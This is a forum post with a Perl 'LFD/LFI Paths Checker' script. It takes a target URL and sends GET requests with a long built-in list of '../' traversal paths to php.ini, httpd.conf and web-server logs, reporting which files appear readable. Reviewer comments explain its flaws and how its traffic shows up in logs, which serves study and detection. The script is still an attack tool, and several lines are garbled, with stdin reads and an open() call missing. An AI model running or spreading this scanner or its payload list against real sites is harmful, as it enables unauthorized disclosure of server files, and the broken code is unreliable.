
Locked LFD/LFI Paths Checker


sQuo


LFD/LFI Paths Checker

 

[LENGUAJE=perl]#!/usr/bin/perl

# m-a_labz

use HTTP::Request;

use LWP::Simple;

use Term::ANSIColor;

use Win32::Console::ANSI;

# Interactive front end of the checker. It asks the operator for a base URL,
# a keyword, a path-list source and an optional results file, then falls
# through to the path-list selection and the request loop further down.
# The script declares no `use strict` / `use warnings`, so every variable
# assigned here is a package global that survives the `goto a` restart.
# NOTE(review): the bare `=;` assignments below are not valid Perl as shown;
# the right-hand side (presumably a read from standard input) appears to have
# been stripped when the page was rendered - confirm against the original.

# Turn off output buffering so each prompt is flushed before input is read.
$|=1;

print color("bold black"), "\n\t[+] LFD/LFI Paths Checker\n";

# Restart label: the `goto a` on the script's last line jumps back here.
a:

print color("bold red"), "\n[+] Enter Url : ";

print color 'reset';

$ex=;

chomp($ex);

# Unanchored match: any input that merely contains "exit" or "quit"
# (for example inside a host name or a path) ends the program.
if ($ex =~ /exit/ ||$ex =~ /quit/) {

exit;

}

# The keyword is the text the operator expects on a page where the requested
# path could NOT be read; the request loop treats its absence as a hit.

print color("bold red"), "[+] Enter KeyWord : ";

print color 'reset';

$keyword=;

chomp($keyword);

# Path-list source: a name matching /.txt/ selects a file, a value containing
# "inside" selects the list embedded in the script.
print color("bold red"), "[+] Enter Paths File : ";

print color 'reset';

$pathsf=;

chomp($pathsf);

# Results file name; hits are appended to it only when it matches /.txt/.
print color("bold red"), "[+] Should I Save Results ? : ";

print color 'reset';

$save=;

chomp($save);

# Prefix "http://" unless the input already contains "http" somewhere.
# The test is unanchored, so input such as "example.test/?u=http"
# (constructed sample) passes it and is then used verbatim, without a scheme.
if ($ex =~ /http/){

$exp = $ex;

}else{

$exp = "http://".$ex;

}

# Choose the candidate path list from $pathsf: a file on disk, the built-in
# list, or neither.
# The /.txt/ test has an unescaped dot, so it matches any character followed
# by "txt" anywhere in the name.
# NOTE(review): the two statements inside this first branch are truncated as
# shown (the open() arguments and the read into @tt are missing), most likely
# lost in page extraction. Also note that `my @tt` is lexical to this block,
# whereas the request loop reads the package variable @tt.
if ($pathsf =~ /.txt/) {

open (tt, "

my @tt = ;

close tt;

}

# Built-in list, selected by a value containing "inside". It holds guessed
# locations of web-server access/error logs, php.ini and httpd.conf on
# Unix-like, Windows and macOS-style layouts, most of them prefixed with runs
# of "../" of varying depth. For defenders these strings are what to search
# for in request logs and what a path-normalising input filter has to reject.
# Several entries appear more than once.
# NOTE(review): the "access.http://www.log" / "error.http://www.log" entries
# look like forum auto-linking damage - confirm against the original post.
elsif ($pathsf =~ /inside/)

{

@tt = (

'/usr/local/apache/logs/audit_log',

'/logs/security_debug_log',

'/logs/security_log',

'/var/log/lighttpd.error.log',

'/var/log/lighttpd.access.log',

'/var/lighttpd.log',

'/var/logs/access.log',

'/var/log/lighttpd/',

'/var/log/lighttpd/error.log',

'/var/log/lighttpd/access.http://www.log',

'/var/log/lighttpd/error.http://www.log',

'/var/log/lighttpd/access.log',

'/usr/local/apache2/logs/lighttpd.error.log',

'/usr/local/apache2/logs/lighttpd.log',

'/usr/local/apache/logs/lighttpd.error.log',

'/usr/local/apache/logs/lighttpd.log',

'/var/log/lighttpd.access.log',

'/var/log/lighttpd.error.log',

'/usr/local/lighttpd/log/lighttpd.error.log',

'/usr/local/lighttpd/log/access.log',

'../../../../../../../../../etc/php.ini',

'../../../../../../../../../bin/php.ini',

'../../../../../../../../../etc/httpd/php.ini',

'../../../../../../../../../usr/lib/php.ini',

'../../../../../../../../../usr/lib/php/php.ini',

'../../../../../../../../../usr/local/etc/php.ini',

'../../../../../../../../../usr/local/lib/php.ini',

'../../../../../../../../../usr/local/php/lib/php.ini',

'../../../../../../../../../usr/local/php4/lib/php.ini',

'../../../../../../../../../usr/local/php5/lib/php.ini',

'../../../../../../../../../usr/local/apache/conf/php.ini',

'../../../../../../../../../etc/php4.4/fcgi/php.ini',

'../../../../../../../../../etc/php4/apache/php.ini',

'../../../../../../../../../etc/php4/apache2/php.ini',

'../../../../../../../../../etc/php5/apache/php.ini',

'../../../../../../../../../etc/php5/apache2/php.ini',

'../../../../../../../../../etc/php/php.ini',

'../../../../../../../../../etc/php/php4/php.ini',

'../../../../../../../../../etc/php/apache/php.ini',

'../../../../../../../../../etc/php/apache2/php.ini',

'../../../../../../../../../web/conf/php.ini',

'../../../../../../../../../usr/local/Zend/etc/php.ini',

'../../../../../../../../../opt/xampp/etc/php.ini',

'../../../../../../../../../var/local/www/conf/php.ini',

'../../../../../../../../../etc/php/cgi/php.ini',

'../../../../../../../../../etc/php4/cgi/php.ini',

'../../../../../../../../../etc/php5/cgi/php.ini',

'../../../../../../../../../php5\php.ini',

'../../../../../../../../../php4\php.ini',

'../../../../../../../../../php\php.ini',

'../../../../../../../../../PHP\php.ini',

'../../../../../../../../../WINDOWS\php.ini',

'../../../../../../../../../WINNT\php.ini',

'../../../../../../../../../apache\php\php.ini',

'../../../../../../../../../xampp\apache\bin\php.ini',

'../../../../../../../../../NetServer\bin\stable\apache\php.ini',

'../../../../../../../../../home2\bin\stable\apache\php.ini',

'../../../../../../../../../home\bin\stable\apache\php.ini',

'../../../../../../../../../Volumes/Macintosh_HD1/usr/local/php/lib/php.ini',

'../../../../../../../../../../../../var/log/httpd/access_log',

'../../../../../../../../../../../../var/log/httpd/error_log',

'../../../../../../../../../../var/log/httpd/access_log',

'../../../../../../../../../../var/log/httpd/error_log',

'../apache/logs/error.log',

'../apache/logs/access.log',

'../../apache/logs/error.log',

'../../apache/logs/access.log',

'../../../apache/logs/error.log',

'../../../apache/logs/access.log',

'../../../../apache/logs/error.log',

'../../../../apache/logs/access.log',

'../../../../../apache/logs/error.log',

'../../../../../apache/logs/access.log',

'../apache2/logs/error.log',

'../apache2/logs/access.log',

'../../apache2/logs/error.log',

'../../apache2/logs/access.log',

'../../../apache2/logs/error.log',

'../../../apache2/logs/access.log',

'../../../../apache2/logs/error.log',

'../../../../apache2/logs/access.log',

'../../../../../apache2/logs/error.log',

'../../../../../apache2/logs/access.log',

'../logs/error.log',

'../logs/access.log',

'../../logs/error.log',

'../../logs/access.log',

'../../../logs/error.log',

'../../../logs/access.log',

'../../../../logs/error.log',

'../../../../logs/access.log',

'../../../../../logs/error.log',

'../../../../../logs/access.log',

'../../../../../../../../../../etc/httpd/logs/acces_log',

'../../../../../../../../../../etc/httpd/logs/acces.log',

'../../../../../../../../../../etc/httpd/logs/error_log',

'../../../../../../../../../../etc/httpd/logs/error.log',

'../../../../../../../../../../usr/local/apache/logs/access_log',

'../../../../../../../../../../usr/local/apache/logs/access.log',

'../../../../../../../../../../usr/local/apache/logs/error_log',

'../../../../../../../../../../usr/local/apache/logs/error.log',

'../../../../../../../../../../usr/local/apache2/logs/access_log',

'../../../../../../../../../../usr/local/apache2/logs/access.log',

'../../../../../../../../../../usr/local/apache2/logs/error_log',

'../../../../../../../../../../usr/local/apache2/logs/error.log',

'../../../../../../../../../../var/www/logs/access_log',

'../../../../../../../../../../var/www/logs/access.log',

'../../../../../../../../../../var/www/logs/error_log',

'../../../../../../../../../../var/www/logs/error.log',

'../../../../../../../../../../var/log/httpd/access_log',

'../../../../../../../../../../var/log/httpd/access.log',

'../../../../../../../../../../var/log/httpd/error_log',

'../../../../../../../../../../var/log/httpd/error.log',

'../../../../../../../../../../var/log/apache/access_log',

'../../../../../../../../../../var/log/apache/access.log',

'../../../../../../../../../../var/log/apache/error_log',

'../../../../../../../../../../var/log/apache/error.log',

'../../../../../../../../../../var/log/apache2/access_log',

'../../../../../../../../../../var/log/apache2/access.log',

'../../../../../../../../../../var/log/apache2/error_log',

'../../../../../../../../../../var/log/apache2/error.log',

'../../../../../../../../../../var/log/access_log',

'../../../../../../../../../../var/log/access.log',

'../../../../../../../../../../var/log/error_log',

'../../../../../../../../../../var/log/error.log',

'../../../../../../../../../../opt/lampp/logs/access_log',

'../../../../../../../../../../opt/lampp/logs/error_log',

'../../../../../../../../../../opt/xampp/logs/access_log',

'../../../../../../../../../../opt/xampp/logs/error_log',

'../../../../../../../../../../opt/lampp/logs/access.log',

'../../../../../../../../../../opt/lampp/logs/error.log',

'../../../../../../../../../../opt/xampp/logs/access.log',

'../../../../../../../../../../opt/xampp/logs/error.log',

'../../../apache/logs/error.log',

'../../../apache/logs/access.log',

'../../../../apache/logs/error.log',

'../../../../apache/logs/access.log',

'../../../../../apache/logs/error.log',

'../../../../../apache/logs/access.log',

'../../../../../../apache/logs/error.log',

'../../../../../../apache/logs/access.log',

'../../../../../../../apache/logs/error.log',

'../../../../../../../apache/logs/access.log',

'../../../../../../../../apache/logs/error.log',

'../../../../../../../../apache/logs/access.log',

'../../../logs/error.log',

'../../../logs/access.log',

'../../../../logs/error.log',

'../../../../logs/access.log',

'../../../../../logs/error.log',

'../../../../../logs/access.log',

'../../../../../../logs/error.log',

'../../../../../../logs/access.log',

'../../../../../../../logs/error.log',

'../../../../../../../logs/access.log',

'../../../../../../../../logs/error.log',

'../../../../../../../../logs/access.log',

'../../../../../../../../../../../../etc/httpd/logs/acces_log',

'../../../../../../../../../../../../etc/httpd/logs/acces.log',

'../../../../../../../../../../../../etc/httpd/logs/error_log',

'../../../../../../../../../../../../etc/httpd/logs/error.log',

'../../../../../../../../../../../../var/www/logs/access_log',

'../../../../../../../../../../../../var/www/logs/access.log',

'../../../../../../../../../../../../usr/local/apache/logs/access_log',

'../../../../../../../../../../../../usr/local/apache/logs/access.log',

'../../../../../../../../../../../../var/log/apache/access_log',

'../../../../../../../../../../../../var/log/apache/access.log',

'../../../../../../../../../../../../var/log/access_log',

'../../../../../../../../../../../../var/www/logs/error_log',

'../../../../../../../../../../../../var/www/logs/error.log',

'../../../../../../../../../../../../usr/local/apache/logs/error_log',

'../../../../../../../../../../../../usr/local/apache/logs/error.log',

'../../../../../../../../../../../../var/log/apache/error_log',

'../../../../../../../../../../../../var/log/apache/error.log',

'../../../../../../../../../../../../var/log/access_log',

'../../../../../../../../../../../../var/log/error_log',

'../../../../../../usr/local/apache/conf/httpd.conf',

'../../../../../../usr/local/apache2/conf/httpd.conf',

'../../../../../../etc/httpd/conf/httpd.conf',

'../../../../../../etc/apache/conf/httpd.conf',

'../../../../../../usr/local/etc/apache/conf/httpd.conf',

'../../../../../../etc/apache2/httpd.conf',

'../../../../../../../../../usr/local/apache/conf/httpd.conf',

'../../../../../../../../../usr/local/apache2/conf/httpd.conf',

'../../../../../../../../usr/local/apache/httpd.conf',

'../../../../../../../../usr/local/apache2/httpd.conf',

'../../../../../../../../usr/local/httpd/conf/httpd.conf',

'../../../../../../../usr/local/etc/apache/conf/httpd.conf',

'../../../../../../../usr/local/etc/apache2/conf/httpd.conf',

'../../../../../../../usr/local/etc/httpd/conf/httpd.conf',

'../../../../../../../usr/apache2/conf/httpd.conf',

'../../../../../../../usr/apache/conf/httpd.conf',

'../../../../../../../usr/local/apps/apache2/conf/httpd.conf',

'../../../../../../../usr/local/apps/apache/conf/httpd.conf',

'../../../../../../etc/apache/conf/httpd.conf',

'../../../../../../etc/apache2/conf/httpd.conf',

'../../../../../../etc/httpd/conf/httpd.conf',

'../../../../../../../../../etc/php5/apache2/httpd/conf/httpd.conf',

'../../../../../../etc/http/conf/httpd.conf',

'../../../../../../etc/apache2/httpd.conf',

'../../../../../../etc/httpd/httpd.conf',

'../../../../../../etc/http/httpd.conf',

'../../../../../../etc/httpd.conf',

'../../../../../opt/apache/conf/httpd.conf',

'../../../../../opt/apache2/conf/httpd.conf',

'../../../../../../../../../etc/php5/apache2/conf/httpd.conf',

'../../../../var/www/conf/httpd.conf',

'../../../private/etc/httpd/httpd.conf',

'../../../private/etc/httpd/httpd.conf.default',

'../../Volumes/webBackup/opt/apache2/conf/httpd.conf',

'../../Volumes/webBackup/private/etc/httpd/httpd.conf',

'../../Volumes/webBackup/private/etc/httpd/httpd.conf.default',

'../../../../../../../../../usr/local/php/httpd.conf.php',

'../../../../../../../../../usr/local/php4/httpd.conf.php',

'../../../../../../../../../usr/local/php5/httpd.conf.php',

'../../../../../../../../../usr/local/php/httpd.conf',

'../../../../../../../../../usr/local/php4/httpd.conf',

'../../../../../../../../../usr/local/php5/httpd.conf',

'../../../../../../../../../Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf',

'../../../../../../../../../Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf',

'../../../../../../../../../Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf',

'../../../../../../../../../Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php',

'../../../../../../../../../Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php',

'../../../../../../../../../Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php',

'/usr/local/etc/apache/vhosts.conf'

);

}else{

# Neither source matched: only a message is printed. Execution still
# continues into the request loop, which then iterates over whatever the
# package variable @tt currently holds (nothing on a first pass, or the list
# left over from an earlier pass after `goto a`).
print color("bold blue"), "\n\tZuHaHaHaHaHa My Master Is BAKA :P\n";

print color 'reset';

}

# Request loop: one HTTP GET per candidate path, issued sequentially.
# The URL is the plain concatenation of the base URL and the candidate path;
# nothing is encoded or validated.
foreach $path (@tt)

{

chomp $path;

$url = $exp.$path ;

$request = HTTP::Request->new(GET=>$url);

# A new LWP::UserAgent is built on every iteration with a 5-second timeout.
# No agent string is set, so requests carry LWP's default
# "libwww-perl/<version>" User-Agent; together with the "../" runs and the
# config/log file names this makes the traffic easy to spot in access logs.
$useragent = LWP::UserAgent->new();

$useragent->timeout(5);

$response = $useragent->request($request);

# Inverted test: a body that contains the keyword is reported "Not Found".
# $keyword is interpolated as a regular expression without \Q...\E, so regex
# metacharacters in it change what is matched; the /g flag does not affect
# the outcome here.
# The HTTP status is never inspected: any response whose body lacks the
# keyword (for instance an error page or a timed-out request) is reported as
# FOUND, so a "FOUND" line is not proof that a file was disclosed.
if ($response->content=~m/$keyword/g)

{

# When the first command-line argument contains "-v" the "Not Found" lines
# are suppressed; otherwise they are printed.
# NOTE(review): `=~ "-v"` treats the string as a pattern, and $ARGV[0] is
# undefined when the script is started without arguments.
if ($ARGV[0] =~ "-v" ){

} else {

print color("bold white"), "[.] $path ";

print "Not Found\n";

}

} else {

print color("bold red"), "[+] FOUND => ";

print color("bold yellow"), "$path\n";

print color 'reset';

# Append the hit to the results file when its name matches /.txt/ (unescaped
# dot, as in the path-file test).
# Two-argument open with an interpolated name and a bareword handle: the mode
# is parsed out of the string and the return value is not checked, so a
# failed open is silent. The three-argument form with a lexical handle is the
# safe spelling.
if ($save =~ /.txt/)

{

open(a, ">>$save");

print a "$path\n";

close(a);

}

}

# Redundant: the loop would advance to the next path anyway.
next;

}

 

# End of one pass over the path list: reset the terminal colour and offer to
# return to a menu.
print color 'reset';

# NOTE(review): `my $back=;` is incomplete as shown, like the earlier prompts
# (presumably a read from standard input that was stripped in extraction).
print "\n\t\t[+] Enter 1 To Go Back To Menu : ";my $back=;

chomp $back;

if ($back eq "1")

{

# "cls" is the Windows console clear command, consistent with the
# Win32::Console::ANSI import at the top of the script.
system("cls");

# require() loads and executes ../main.pl, a file that is not part of this
# page. The path is relative, so which file runs presumably depends on the
# directory the script was started from - verify before trusting it.
require("../main.pl");

}

# Any other answer, and the return from require, falls through to the restart
# label and prompts for a new URL.
goto a;[/LENGUAJE]
